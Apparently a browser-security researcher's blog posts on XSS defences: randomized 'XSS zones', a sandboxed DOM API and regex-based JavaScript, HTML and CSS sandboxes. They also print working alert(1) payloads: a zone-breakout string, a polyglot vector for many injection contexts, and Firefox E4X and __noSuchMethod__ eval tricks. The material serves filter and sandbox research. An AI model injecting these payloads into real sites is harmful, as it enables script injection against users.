XSS Zones

One of the impossible problems of the web is how to protect a site that has a persistent XSS hole yet requires JavaScript to function. I thought about this for a while and worked out that you could create an XSS zone wherever you expect user input. Declaring a zone is tricky, because if you have a start and end marker the attacker can include that marker in their own markup and break out of the zone.

Let’s take a look at some code as a reference:-

<!-- Begin XSS zone -->
Hello I am a twitter..I mean webgoat
<!-- End XSS zone -->

So we define an XSS zone where we allow untrusted input. The idea of the zone is that JavaScript, events and CSS are locked down or disabled inside it, stopping a worm or evil input from spreading or causing information disclosure. But now the attacker has a new string to inject, <!-- End XSS zone --><img src=1 onerror=alert(1)>, and they have broken out of the zone.

The solution to this problem is to randomize the zone name:-

<!-- Begin XSS zone 9cb3c2fd7ef861d762471c90de049603806e315eea3daf13e0b8faadd6b9e85db09afeab9430d8f58d1f7e8551745ec3f3961be932b79247f56c12db5c7e2e8d -->
Evil content
<!-- End XSS zone 9cb3c2fd7ef861d762471c90de049603806e315eea3daf13e0b8faadd6b9e85db09afeab9430d8f58d1f7e8551745ec3f3961be932b79247f56c12db5c7e2e8d -->

Before the HTML is rendered, the browser looks for the XSS zone name; when it finds the first zone name it continues parsing the HTML until the matching end marker is found. Any other zone markers inside are ignored. The random zone name is generated on every request, and the markers are removed from the markup before rendering.
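The matching rule above can be sketched in JavaScript (Node.js). This is a minimal sketch, assuming the server generates the key with Node's crypto.randomBytes; wrapInZone and findZones are hypothetical names, and no browser actually implements this. The point it shows is that only an end marker carrying the exact per-request key closes the zone, so an injected <!-- End XSS zone --> is just more content inside it.

```javascript
const crypto = require('crypto');

// Hypothetical server-side helper: wrap untrusted content in a zone whose
// name is a fresh random key for this request.
function wrapInZone(content, config) {
  const key = crypto.randomBytes(32).toString('hex'); // 64 hex characters
  const begin = '<!-- Begin XSS zone ' + key + (config ? ' ' + config : '') + ' -->';
  const end = '<!-- End XSS zone ' + key + ' -->';
  return { key, html: begin + '\n' + content + '\n' + end };
}

// Hypothetical browser-side matching: find each Begin marker, then jump to the
// End marker with the same key. Markers without that key (including any the
// attacker injected) are treated as ordinary zone content.
function findZones(html) {
  const zones = [];
  const beginRe = /<!-- Begin XSS zone ([0-9a-f]{64})([^>]*?) -->/g;
  let m;
  while ((m = beginRe.exec(html)) !== null) {
    const endMarker = '<!-- End XSS zone ' + m[1] + ' -->';
    const start = m.index + m[0].length;
    const stop = html.indexOf(endMarker, start);
    if (stop === -1) continue; // unmatched Begin marker: ignore it
    zones.push({ key: m[1], config: m[2].trim(), content: html.slice(start, stop) });
    beginRe.lastIndex = stop + endMarker.length; // skip any markers nested inside
  }
  return zones;
}
```

For example, wrapping the breakout string from earlier still yields exactly one zone whose content includes the injected fake end marker and the img tag.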

XSS zones would require an inbuilt JavaScript/HTML/CSS sandbox which would only allow harmless markup. Any input that is accepted from the user would have to be declared within an XSS zone, and the feature would have an ON/OFF switch somewhere, maybe an HTTP header. The zones themselves could have simple configurable attributes, e.g. javascript=false css=false html=true urls=sameorigin.

Defining a zone could be done manually, by generating a random name and outputting the HTML comment, or the server-side language could detect where variables are used and output the zone markers automatically. Using HTML comments is interesting because they act as both an HTML and a JavaScript comment, enabling a nice fallback.
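The automatic option could look something like a tagged template that wraps every interpolated value in its own zone. This is a minimal sketch in JavaScript (Node.js), assuming the server renders HTML with template literals; zoned is a hypothetical name, and the fixed javascript=no css=no configuration is just an example. Sandboxing the zone content is still left to the browser.

```javascript
const crypto = require('crypto');

// Hypothetical tag: every ${value} becomes its own XSS zone with a fresh key,
// while the literal template text written by the developer stays outside zones.
function zoned(strings, ...values) {
  let out = strings[0];
  values.forEach((value, i) => {
    const key = crypto.randomBytes(32).toString('hex');
    out += '<!-- Begin XSS zone ' + key + ' javascript=no css=no -->' +
      String(value) +
      '<!-- End XSS zone ' + key + ' -->' +
      strings[i + 1];
  });
  return out;
}

const username = '<img src=1 onerror=alert(1)>';
const html = zoned`<p>Hello ${username}</p>`;
```

The developer's own markup (<p>Hello and </p>) stays outside the zone, while the untrusted username lands inside a zone whose key the attacker can't predict.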

One final way to enable XSS zones would be to use the browser itself: similar to how Firebug and the IE Developer Toolbar allow you to select DIVs and other elements, an advanced user could select an area of a site that they decide requires an XSS zone. The browser would then monitor this section of the site and automatically add a random XSS zone to the markup.

Configuration of zones

Zones should always follow the format <!-- Begin XSS zone RANDOMKEY CONFIGURATION_DATA --> and end with <!-- End XSS zone RANDOMKEY -->

The configuration should be simple and precise. The following commands should be supported.
javascript=no|yes|domains*
css=no|yes|domains*
urls=sameorigin|domains|proxied*

* Domain list should be a whitelist only, no global wildcards allowed.
* Proxied should route all URLs through a proxy service that fetches the image data or follows the link without sending cookie information, pre-checking the content with a malware scanner.
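A parser for this configuration might look like the following. It is a minimal sketch under assumptions the format above doesn't pin down: options are space-separated key=value pairs, a domain list is comma-separated, only the three options listed above are accepted, and missing options default to the most restrictive value. parseZoneConfig is a hypothetical name.

```javascript
// Hypothetical parser for the zone configuration described above.
// Assumptions: space-separated key=value pairs; domain lists are comma-separated.
const KEYWORDS = {
  javascript: ['no', 'yes'],
  css: ['no', 'yes'],
  urls: ['sameorigin', 'proxied'],
};
// Strict dotted hostname check: no wildcards, so "*" or "*.example.com" fail.
const DOMAIN = /^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$/i;

function parseZoneConfig(text) {
  // Restrictive defaults when an option is missing.
  const config = { javascript: 'no', css: 'no', urls: 'sameorigin' };
  for (const pair of text.trim().split(/\s+/).filter(Boolean)) {
    const eq = pair.indexOf('=');
    const key = pair.slice(0, eq);
    const value = pair.slice(eq + 1);
    if (eq < 1 || !Object.prototype.hasOwnProperty.call(KEYWORDS, key)) {
      throw new Error('Unknown option: ' + pair);
    }
    if (KEYWORDS[key].includes(value)) {
      config[key] = value;
      continue;
    }
    // Otherwise the value must be a whitelist of concrete domains.
    const domains = value.split(',');
    if (!domains.every((d) => DOMAIN.test(d))) {
      throw new Error('Invalid domain list for ' + key + ': ' + value);
    }
    config[key] = domains;
  }
  return config;
}
```

Rejecting anything unrecognised, rather than ignoring it, keeps the configuration "simple and precise": a typo fails loudly instead of silently falling back to a weaker setting.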

That was the basis of my idea; if you like it, implement it.

One vector to rule them all

I set myself a fun challenge to create a vector that would execute in many contexts, the idea being that it should work regardless of where it’s placed. For example:-

"xss"
'xss'
<tag alt="xss">

As an added challenge I tried to execute only one payload and, where possible, to use a single eval. I had to use multiple evals as the contexts increased, because for contexts like background= there was no way I could figure out to reuse the existing one :( So I got to around 19 contexts, then got bored.

One vector to xss them all, one vector to find them,
One vector to bring them all and in the darkness bind them.


javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

Update: added new vectors and removed any that weren’t required. Thanks to @LeverOne!!

2nd update… Fixed comments, and added name to the [] rule so it executes without window.name for DOM rules. Thanks again to @LeverOne for some fixes.

Function is the new window

I discovered while reading some Firefox code that E4X allows you to call standard functions by using the special function namespace. This is cool! We can now define setters etc. on the XML prototype and call functions on E4X objects. It looks like this:-

<></>.function::toString();

Would Firefox be crazy enough to include this special namespace on all objects? Well, they made the decision to include E4X methods on every object, so I guessed there was no reason it wouldn’t be included on window. It is the global object after all, and that means…..

function::['alert'](1)//mario discovered this :)

Yes, that is why “function” is the new window. But it doesn’t finish there, oh no, it gets even better: Yosuke Hasegawa found some “magic strings”. That means that once the namespace has been accessed, it stays available for the rest of the browser session. Just reading a property is enough to trigger a magic string. The following syntax is perfectly valid in Firefox, you crazy cats.

<></>.function::['x'];//required once in a browser session
$="@mozilla.org/js/function";_="alert";$::[_](1)

I’d like to thank my fellow crazy JavaScript slackers:- Yosuke Hasegawa, Jonas Magazinius and Mario Heiderich for making Firefox appear nuts.

* Disclaimer: if your sandbox breaks with the above code, consider writing a better sandbox.

setTimeout and setInterval

I haven’t posted for a while, and you may have missed this on Twitter.

setTimeout("MsgBox 1",0,'VBS');

Cool, so setTimeout supports VBScript via its language argument. Yeah, I can read MSDN :) but JScript.Encode!!! Yet another place. I wonder what else remains undiscovered….

setTimeout("#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@",0,'JScript.Encode');
setInterval("#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@",0,'JScript.Encode');

Setters using VBS and constant hacks

I wasn’t going to blog this because I couldn’t be bothered, but Mario asked me if I had it documented anywhere and I guess it’s nice to have it written down somewhere. I was looking to create setters in legacy browsers like IE7, and it would also be nice to use them on custom objects in IE8. I came up with the following VBS hack:-

execScript("Class c\nProperty Let x(y)\nalert(y)\nEnd Property\nEnd Class\nSet obj=new c","VBScript");obj.x=1;//yeah js calls vbs ;)

Pretty cool calling VBS from JS then using a VBS object inside JS :)

OK, and now some constant stuff I tweeted before but quite like, so I’ll post it here too. Constants are weird in JavaScript: when you think about them you think of a value that cannot change, but when it comes to objects only the variable binding is constant, not the object itself. I dunno why; they could be implemented quite easily by creating a getter-only object, but anyway:-

//example1
const x={};x.y=123;alert(x.y)//Objects aren't constants!

//example2 (needs to run separately, of course)
const x={};x.toString=x.valueOf=function() { return 1; };alert(x)
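The getter-only idea mentioned above can be sketched in modern JavaScript. This is a minimal illustration rather than anything from the original tweets: constObject and assignStrict are hypothetical helpers, and the built-in Object.freeze gives a similar (shallow) effect for plain data properties.

```javascript
// Hypothetical helper: copy each value into a getter-only, non-configurable
// property, then stop new properties from being added.
function constObject(values) {
  const obj = {};
  Object.keys(values).forEach((key) => {
    const value = values[key];
    Object.defineProperty(obj, key, { get: () => value, enumerable: true });
  });
  return Object.preventExtensions(obj);
}

// In strict mode, writing to a getter-only property (or adding a property to a
// non-extensible object) throws a TypeError; in sloppy mode it is ignored.
function assignStrict(obj, key, value) {
  'use strict';
  try {
    obj[key] = value;
    return true;
  } catch (e) {
    return false;
  }
}

const x = constObject({ y: 1 });
console.log(assignStrict(x, 'y', 123), x.y); // false 1
console.log(assignStrict(x, 'z', 1), x.z);   // false undefined
```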

Finally I’ll leave you with a quiz: what is “x” equal to, without running it?:-

var x=1; function y() { x=3; alert(x); return; const x=2;}y()// x == ?

Sandboxed DOM API

Description

I finally sat down and started work on a sandboxed DOM API. Originally I was just going to develop a new framework because the DOM is messy, but instead I decided it would be cool to have a safe simulated DOM and build a framework on top of that.

It isn’t complete yet and there’s still a lot of work to do, but it’s working pretty well. I still need to run some tests on it and try to break it, but I don’t have time at the moment as I need to do other stuff.

One of the problems with making a DOM API is that IE lacks setter support: even IE8 doesn’t allow you to define setters on normal objects. Because I spend most of my time hacking stuff, it was a fun challenge to make IE support setters on DOM objects and keep my sandboxed whitelists.

It’s quite complicated and quite ugly in parts but it works and I think it’s the only way to support legacy browsers like IE7.

How it works

I have to test for the various kinds of setter support, including __defineSetter__ and Object.defineProperty, and fall back to the legacy onpropertychange. Object.defineProperty works fine in IE8 when used on a DOM object, but I encountered problems when I needed to assign to a sandboxed normal object. Here it gets ugly: I had to create a DOM object for any styles used by a node, so that both Object.defineProperty and onpropertychange allow me to monitor any assignments to the fake style object.

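var styles = document.createElement('span'); // DOM node acting as the fake style object
node.$style$ = styles;
if (Object.defineProperty) {
  // IE8: accessors can only be defined on DOM objects, hence the span
  Object.defineProperty(styles, '$'+cssProp+'$', { set: function(value) { /* sandbox value with CSSReg */ } });
} else {
  // IE7: onpropertychange only fires once the node is in the document
  document.getElementById('styleObjs').appendChild(styles);
  styles.onpropertychange = function() { /* window.event.propertyName names the assigned property */ };
}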

As you can see in the code sample above, I have to append the fake style DOM object to the document for onpropertychange, otherwise it won’t be called on assignments.

You can see this working by using the following test code:-

document.getElementById('x').style.color='#ccc';

So I proxy all these functions, make the root node any HTML object, and use CSSReg and HTMLReg to sandbox each modification to a property. Finally, where it got complicated was supporting events. Currently I only support “onclick”, as I’m still testing. Because the code is already sandboxed I don’t need to perform a rewrite, so I pass it to JSReg as already-converted code and supply the HTML element as the “this” object, which allows the triggered event to use “this” as the current element.
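In browsers with full accessor support, the sandboxed style object described above can be sketched without the DOM-object workaround. This is a minimal modern sketch, not the OWASP code: makeSandboxedStyle, the property whitelist and the isSafeValue check are hypothetical stand-ins for what CSSReg does, and a plain object stands in for the real node.style.

```javascript
// Hypothetical sandboxed style object: each whitelisted CSS property gets a
// setter that validates the value before forwarding it to the real style.
function makeSandboxedStyle(target, allowedProps, isSafeValue) {
  const fake = {};
  allowedProps.forEach((prop) => {
    Object.defineProperty(fake, prop, {
      get: () => target[prop],
      set: (value) => {
        value = String(value);
        if (isSafeValue(prop, value)) target[prop] = value; // otherwise drop it
      },
      enumerable: true,
    });
  });
  // Non-whitelisted properties (e.g. behavior) can't be added at all.
  return Object.preventExtensions(fake);
}

// Toy value check standing in for CSSReg: hex colours, keywords, plain lengths.
function isSafeValue(prop, value) {
  return /^(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]+|\d+(px|em|%))$/i.test(value);
}

const realStyle = {}; // stands in for node.style
const style = makeSandboxedStyle(realStyle, ['color', 'width'], isSafeValue);
style.color = '#ccc';                 // forwarded to realStyle
style.width = 'expression(alert(1))'; // rejected by the check
```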

That’s it! I’ve donated the code to OWASP and it will be free to use in your projects. Any help testing, or suggestions, are most welcome. Enjoy the demo!

Sandboxed DOM API

Astalanumerator 0.7

Just a quick post to let you know I’ve updated Astalanumerator in case you use it somewhere. I host it on CodePlex: I thought I’d give it a whirl, as I’ve seen other people host their projects there and it looks decent.

This version contains various CSS fixes and tracks each object both within links and via the astalanumerator object. This was quite tricky because I allow stuff like “/a/”, and because you can click through many different properties it’s hard to keep track of each of them. Each click now jumps you straight to the list of props for that object instead of just showing it in the URL. The objects are colour coded now and the inspector fills the screen. You should notice it’s much faster than the original one, and it inspects properties using three methods: 1. a normal for..in loop, 2. a manual list of props I’ve collected, 3. the IE Enumerator object. Enjoy!

Source code
New version
Old version
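Combining several enumeration methods and de-duplicating the results, as described for this version, can be sketched like this. It is a minimal sketch, not Astalanumerator's code: IE's Enumerator object isn't available outside old IE, so Object.getOwnPropertyNames along the prototype chain is swapped in as the third method, and knownProps is a hypothetical stand-in for the manually collected list.

```javascript
// Hypothetical stand-in for a manually collected list of property names that
// for..in may miss (non-enumerable built-ins).
const knownProps = ['constructor', 'toString', 'valueOf', 'length', 'source'];

function enumerateProps(obj) {
  const found = new Set();
  // 1. A normal for..in loop (enumerable properties, including inherited ones).
  for (const key in obj) found.add(key);
  // 2. The manual list, checked with the `in` operator.
  knownProps.forEach((key) => { if (key in Object(obj)) found.add(key); });
  // 3. Own property names at every level of the prototype chain
  //    (used here instead of IE's Enumerator).
  for (let o = Object(obj); o !== null; o = Object.getPrototypeOf(o)) {
    Object.getOwnPropertyNames(o).forEach((key) => found.add(key));
  }
  return Array.from(found).sort();
}
```

Using a Set means a property found by more than one method is only listed once.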

Can all Mozilla people look away now please

The custom setter syntax is being removed from Firefox in the next version... boo, I hear you say (well, at least some of you). If you don’t know, ages ago Firefox decided to create its own setter syntax (I love it when you do that, you know), and it looked something like this:-

a setter=alert,a=1//calls alert(1)

Wacky indeed. They decided to remove it. So I was messing with JavaScript like I do near enough every day, and I stumbled upon this:-

Object.prototype.__noSuchMethod__=function(s){ alert(s); };
1..*(1)

What was surprising was that alert showed “*”, not 1 as you would expect. The craziness then continued:-

Object.prototype.__noSuchMethod__=function(s){ eval(s); };1.['alert(1)']()

I hadn’t looked at MDC and still didn’t understand why this was happening until Mario pointed out “oh, it’s sending the name of the function via __noSuchMethod__”, then a big doh moment: oh yeah. But then that means…..we have a new setter syntax!!!!

//existing code
function x(s) {
  eval(s);
}
//our evil injection
Object.prototype.__noSuchMethod__=x;new/a/['alert(1)']

If you work at Mozilla please look away now because I like this crazy syntax so don’t fix it.
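__noSuchMethod__ was a non-standard SpiderMonkey extension and has since been removed from Firefox. For comparison, a rough standard equivalent of the behaviour Mario spotted (the handler receiving the property name, whatever string it is) can be written with an ES2015 Proxy. This sketch only records the names instead of evaluating them; withNoSuchMethod is a hypothetical name.

```javascript
// Wrap an object so that calling a missing method invokes handler(name, args),
// roughly what __noSuchMethod__ used to do in old Firefox. Unlike the original,
// any read of a missing property returns a function, not only calls.
function withNoSuchMethod(target, handler) {
  return new Proxy(target, {
    get(obj, name, receiver) {
      if (name in obj) return Reflect.get(obj, name, receiver);
      return (...args) => handler(name, args);
    },
  });
}

const calls = [];
const obj = withNoSuchMethod({}, (name, args) => calls.push([name, args]));
obj['alert(1)']();   // the "method name" is just the string 'alert(1)'
obj['*'](1);
// calls → [['alert(1)', []], ['*', [1]]]
```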

Hackvertor Ajax applications

I hate to use the word Ajax because there’s no XML involved, just nice JSON, but Hackvertor now has Ajax applications! At the moment they’re very rough around the edges, but they will improve when I get more spare time to work on them. What does it mean? Well, you can now share actual HTML/JS based applications on Hackvertor, built from your own code, that can store and load data. Each time you create a tag inside the applications category, it automatically gets added to the applications section, and the app then appears in the list when you click on the navigation.

How to create a HV app

It’s slightly different from creating a tag: apps use an object to contain the mini site. This way you can write a forum in fewer than 100 lines :) The best-practice way I came up with was to use an anonymous closure, which contains a user variable holding info about the current user. Then each section is split into a different property of the site object. The object doesn’t need to be called site, but I thought it was handy to think of it that way.

There are two special properties of the “site” object. The first is home, which is required in order to run your application and returns the first page the user sees. The second is styles, which allows you to style all of your app in one place. All HTML/CSS is controlled by HTMLReg and CSSReg, and JavaScript is handled by JSReg.
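Putting those pieces together, an app might be shaped like the following. This is a sketch under assumptions: getUser is stubbed so the snippet runs on its own (inside Hackvertor the real getUser from the API functions list would be used), and the section names, styles and HTML are made up for illustration.

```javascript
// Stub so the sketch runs standalone; Hackvertor supplies the real getUser().
function getUser() {
  return { userID: 1, username: 'guest' };
}

// The anonymous closure keeps `user` private; each property of `site` is a
// section of the app.
var site = (function () {
  var user = getUser();
  return {
    // Special: styles for the whole app in one place.
    styles: '.post { border: 1px solid #ccc; }',
    // Special: required, returns the first page the user sees.
    home: function () {
      return '<p>Welcome ' + user.username + '</p>' +
        '<a href="#topic?0">First topic</a>';
    },
    // An ordinary section, reachable through #topic?ID links.
    topic: function (id) {
      return '<div class="post">Topic ' + Number(id) + '</div>';
    },
  };
})();
```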

To see how it works, take a look at a very simple/bad app I wrote quickly:-
Forum sample code
Forum demo

You can call each section of your app by using # URLs. For example, let’s say you wanted to call the “Cancel” function of your “site” object: all you need to do is create a URL with #Cancel. Arguments can be sent to your functions in links by using “?”; for example, in the forum I use #topic?0 to pass the id number to the topic function. This also works nicely with forms: you just give a submit button the name of your site function as its value, and it will automatically gather all the form values and send an object referencing them all. To see how this works in the forum app, just take a look at the Save section. Here is how the submit button calls it:-

<input type="submit" value="Save" />

Hackvertor automatically scans all inputs/links and adds an onclick handler to call your function named in the value attribute or the location.hash of the link. The above HTML actually does something like this:-

<input type="submit" value="Save"  onclick="site.Save(this.form)" />
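The #name?argument link convention could be dispatched roughly like this. This is a hypothetical sketch, not Hackvertor's code: route is an invented name, the fallback to home for unknown names is an assumption, and the demo object is a trivial stand-in for a real site object. Form handling is left out.

```javascript
// Hypothetical dispatcher for links like #Cancel or #topic?0: the part before
// "?" names a function on the site object, the rest is passed as an argument.
function route(site, hash) {
  var match = /^#([A-Za-z_$][\w$]*)(?:\?(.*))?$/.exec(hash);
  // Only call the site object's own functions, never inherited ones.
  if (!match || !Object.prototype.hasOwnProperty.call(site, match[1]) ||
      typeof site[match[1]] !== 'function') {
    return site.home();
  }
  return match[2] === undefined ? site[match[1]]() : site[match[1]](match[2]);
}

var demo = {
  home: function () { return 'home'; },
  Cancel: function () { return 'cancelled'; },
  topic: function (id) { return 'topic ' + id; },
};
```

The own-property check matters: without it, a link like #constructor would reach Object.prototype instead of a section of the app.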

Limitations

I need to write a DOM layer to allow sandboxed assignments to CSS and HTML attributes. Without it apps are pretty restrictive at the moment, but you could still write an IM application or a shared messaging app. It also means that things like document.getElementById and custom event handlers won’t work. You are also limited in what kind of HTML/CSS can be executed by the sandboxes. There are browser bugs too :( I’ve not tested it fully yet.

App API functions

getUser() – Returns an object describing the current user. The properties include: userID, username, image. Image will only be returned if the user has uploaded a picture.

loadStorage((string) appID, (int) id) – Loads a JSON string. AppID is the application name, id is a number used to refer to a section such as a forum topic.

saveStorage((string) appID, (int) id, (string) JSON, insert|update) – Saves a JSON string. AppID is the application name, id is a number used to refer to a section such as a forum topic. JSON is a string of JSON data you want to store. The last parameter chooses whether to insert or update the JSON data; the userID of the current user is used to check permissions.

Regular expression sandboxing

Birth of the regex sandbox

I decided today to do a proper blog post to explain my reasons for creating regex sandboxes. I don’t often write a lot of words on this blog, partly because I’m not very good at making long meaningful sentences and partly because I think the point can often be made in fewer words. Hopefully this will be useful for someone writing filters.

First off, a quote: “You can’t parse [X]HTML with regex. Because HTML can’t be parsed by regex. Regex is not a tool that can be used to correctly parse HTML” (from Stack Overflow). I agree with the comment that it isn’t possible to fully parse HTML with regexes, but my goal wasn’t to do that: I wanted to parse a safe form of HTML. I also have an uncontrollable urge to do something that people say can’t be done.

Now we have that out of the way, how did this all begin? Well, I was building a char-by-char JavaScript parser inside JavaScript to allow untrusted code to be executed. Every time I wrote a simple string matching function I found myself taking shortcuts and using regexes instead. For example, why loop through all the characters when you can whitelist the desired ones? I soon found that using regexes instead of parsing every character gave me a great advantage, because I could use the native JavaScript engine to help me.

This led me to develop JSReg [1]. At first it seemed very easy to match JavaScript; numbers and strings were pretty easy, but I then encountered one of the first problems of regex sandboxes: it is very difficult to match something that can contain itself. For example, an array can contain pretty much any JavaScript expression, including other arrays, so how do you define a regex that matches it? I didn’t really have an answer to this. One of my solutions was to create a recursive regex that created a second compiler to match inside the first match, and so on. But this was slow, and because JavaScript doesn’t have lookbehind, previous matches would eat characters in the next match (I’ll talk more about this in the design). My other idea was to use backreferences, but these are very difficult to track when using multiple regexes, and they only return a successful match; in my tests it wasn’t possible to produce a perfect array match using backreferences. I could be wrong of course, I know I’m not perfect.

The design

The basis of my design was to not rely on 3rd party code where possible, which means no jQuery etc. In addition, I should employ multiple layers of security wherever possible. These were good design decisions: throughout initial testing the multiple layers proved difficult to break down. For JSReg the first layer was an iframe, created afresh for each execution, giving fresh prototypes and a throwaway box once execution had finished. Then I whitelisted all JavaScript objects/properties by forcing all methods and properties to use a “$” prefix and suffix. Each variable assignment was then localized using var to force local variables. Each object was also checked to ensure it didn’t contain a window reference.

JavaScript arrays proved tricky, as mentioned earlier, because of the amount of code that can be included within them. Initially I decided to try to match them and their contents, but there were several performance problems with matching all that code, plus JavaScript regex limitations. For example, I use one regex with a replace function to globally match each sequence using groups; the idea is to match all the valid objects first. In the case of an array you’d first match all regex objects, strings etc., because they can contain a "[" or "]", then once all valid objects have been consumed by the regex engine it will encounter the first "[" of our array.
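The ordering trick can be illustrated with a single global regex whose alternatives match strings and regex literals before brackets, so a "[" inside 'a[b' or /[x]/ is consumed as part of that token and never reaches the bracket alternative. This is a deliberately tiny sketch, not JSReg's grammar: it only knows strings, simple regex literals, brackets and "anything else", and it can't tell a regex literal from a division.

```javascript
// Alternatives are tried left to right at each position, so strings (group 1)
// and regex literals (group 2) swallow their inner brackets before group 3 can
// see them. Group 4 consumes any other single character.
var tokenRe = /("(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*')|(\/(?:[^\/\\\n\[]|\\.|\[(?:[^\]\\\n]|\\.)*\])+\/[gim]*)|([\[\]])|([\s\S])/g;

// Returns only the brackets that are part of the code's structure.
function structuralBrackets(code) {
  var brackets = [];
  code.replace(tokenRe, function ($0, $string, $regex, $bracket) {
    if ($bracket !== undefined) brackets.push($bracket);
    return $0;
  });
  return brackets.join('');
}
```

For example, structuralBrackets("x['a[b'][/[x]/.source]") yields "[][]": the brackets inside the string and the regex literal are never seen as structure.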

This works well in practice for every object apart from arrays. In JavaScript the array literal shares the same syntax as the object accessor, so you have to tell the difference between an array literal and an object accessor. Sounds easy?

[][0[0,0[0]]];
+[][0[0,0[0]]];
{}['I am an array']
~{a:0}['I am a object accessor']

As you can see from the samples above, you'd have to match the entire JS syntax before the opening "[". Then, if you don't match the entire sequence inside the array, you won't know whether the ending "]" belongs to an array literal or an object accessor. This problem was unsolved for a long time. The main reason was that, in order to protect against window references, I rewrite object accessors like obj['abc'] to obj[JSREG_FUNC.gp('abc')], so the function returns a safe string which uses the $ prefix/suffix, e.g. abc becomes $abc$. Because the rewritten expression returns a single string, applying it to an array literal that wasn't detected as one would break the array.
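The effect of that rewrite can be sketched as a tiny property-name guard. This is a hypothetical illustration of the $name$ convention, not JSReg's actual JSREG_FUNC.gp: sandboxed objects only ever store properties under $-wrapped names, so a computed lookup can never reach a real built-in like constructor or __proto__.

```javascript
// Hypothetical equivalent of JSREG_FUNC.gp: turn any computed property name
// into its sandboxed $name$ form.
function gp(name) {
  return '$' + String(name) + '$';
}

// Sandboxed code `obj['abc']` is rewritten to `obj[gp('abc')]`, and sandboxed
// objects store their properties under the wrapped names.
var obj = { $abc$: 123 };

var value = obj[gp('abc')];           // 123
var escaped = obj[gp('constructor')]; // undefined, not the Object constructor
```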

Detecting an array or object accessor was also difficult because of the design: if a regex object like /abc/ is matched and is followed by an object accessor, as in /abc/['source'], the previous expression has already been eaten by the parser, so the next match is effectively ['source'], which JSReg understandably thinks is an array. A simple way round this would be a lookbehind checking whether the characters before the opening "[" make it an array or not. But JavaScript doesn't support lookbehinds! :( (Lookbehind assertions only arrived later, in ES2018.)

The simple workaround was to use Array(1,2,3) for arrays instead and assume no "[" and "]" were arrays. This worked, but it broke existing code. Finally, after many attempts, I think I've come up with a solution. I store a list of previous matches and rewrite all array literals and object accessors into a function or method call. This means I no longer need to detect the end of the array, as both now end with a ")" instead of a "]". This is easily demonstrated with a code example:-

[1,2,3] //becomes:-
A(Number(1),Number(2),Number(3))

window['x']//becomes:-
$window$.JSREG_PROP('x')
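With a record of the previous match, deciding what a "[" is becomes a check on that previous token. Below is a minimal sketch assuming a simplified rule: a "[" directly after an identifier, number, string, regex, value keyword, ")" or "]" is an accessor; anything else opens an array literal. classifyBracket is a hypothetical name, the {type, value} tokens are assumed to come from an earlier tokenizing pass, and a preceding "}" is deliberately left unresolved because, as the {}[...] and ~{a:0}[...] samples show, it depends on whether the braces were a block or an object literal.

```javascript
// Hypothetical rule set, assuming an earlier pass has tokenized the code into
// {type, value} objects and kept the previous token around.
var ACCESSOR_AFTER = ['identifier', 'number', 'string', 'regex'];
// Keywords that produce a value, so a following "[" reads from it.
var VALUE_KEYWORDS = ['this', 'true', 'false', 'null'];

function classifyBracket(prevToken) {
  if (!prevToken) return 'array';                                // start of input
  if (ACCESSOR_AFTER.indexOf(prevToken.type) !== -1) return 'accessor'; // a[0], /a/[0]
  if (prevToken.type === 'keyword') {
    // this[0] reads a property; return [0] starts an array literal.
    return VALUE_KEYWORDS.indexOf(prevToken.value) !== -1 ? 'accessor' : 'array';
  }
  if (prevToken.value === ')' || prevToken.value === ']') return 'accessor'; // f()[0], [][0]
  if (prevToken.value === '}') {
    // {}[...] vs ~{a:0}[...]: depends on whether "}" closed a block or an object.
    throw new Error('ambiguous "[" after "}": needs block/object context');
  }
  return 'array';                                                // after operators, "(", ",", ...
}
```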

Finally, as part of the design, I check the JavaScript syntax before and after conversion; this provides another layer of security if the rewrite fails at any point while matching the code.
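One way to perform such a syntax check in JavaScript is to hand the code to the Function constructor, which parses the body and throws a SyntaxError on invalid input without running it. This is a sketch of the idea, assuming Function is an acceptable parser for the purpose; the post doesn't say exactly how JSReg performs its check, and rewriteFn is a placeholder for the real rewrite.

```javascript
// Returns true if `code` parses as a function body. Creating the function
// parses the body but does not run it; current engines parse the body on its
// own, so text like "})" can't escape it.
function isValidSyntax(code) {
  try {
    new Function(code);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Check before and after a (placeholder) rewrite; refuse to return anything
// that fails either check.
function safeRewrite(code, rewriteFn) {
  if (!isValidSyntax(code)) throw new SyntaxError('input does not parse');
  var output = rewriteFn(code);
  if (!isValidSyntax(output)) throw new SyntaxError('rewrite produced invalid code');
  return output;
}
```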

The code

JavaScript is difficult to match, but I found HTML/CSS easier. At first I started the code for HTMLReg [2] and CSSReg [3] in a similar way to JSReg. Then, while hacking my own code, I realized how I could make it better at defending against attack. First off, I employed a strict whitelist to remove any partially open HTML attacks and evil attributes that were obvious attacks. This means I didn't stick to the HTML specification; I don't allow any junk in attributes. For example, if you want to include "<" or ">" inside a title attribute then you have to encode it. I may allow them in future if it can be proven safe, but I'd rather not fight something I can't win. You may disagree with what I've just said, but your filter is probably being pwnd right now.

Once I had my whitelist of tags and attributes, I constructed regexes for the individual parts I wanted to match, for example text nodes, invalid tags and valid attributes. These were chained together into one big regex, with each part in its own group so that each expression can be matched and validated separately.

Here is how it works:-

html.replace(mainRegExp, function($0, $styleTag, $tag, $text, $invalidTags) { /* ... */ });

Notice that I don't do html = html.replace(...): the replace callback is only used to visit each match, and the result is built up in a separate output variable, so only text matched by my regexes ends up in the output. I prefer to use replace because each group is handed to me automatically as a named local variable. This was a lesson I learned from developing JSReg: if the replace fails to match, it returns your original code rather than a rewritten version.

Inside the function, each block does a couple of things; I'll use the text node as an example:-

if($text !== undefined && $text.length) {
  output += $text;
  parseTree+='text('+$text+')\n';
}

Here, if the text node is matched, it is added to the output. The parse tree is a nice way of keeping track of what you've matched, and a useful debugging reference. The if statement is required because of browser inconsistencies when matching groups: some browsers give undefined for a group that didn't take part in the match, others an empty string.
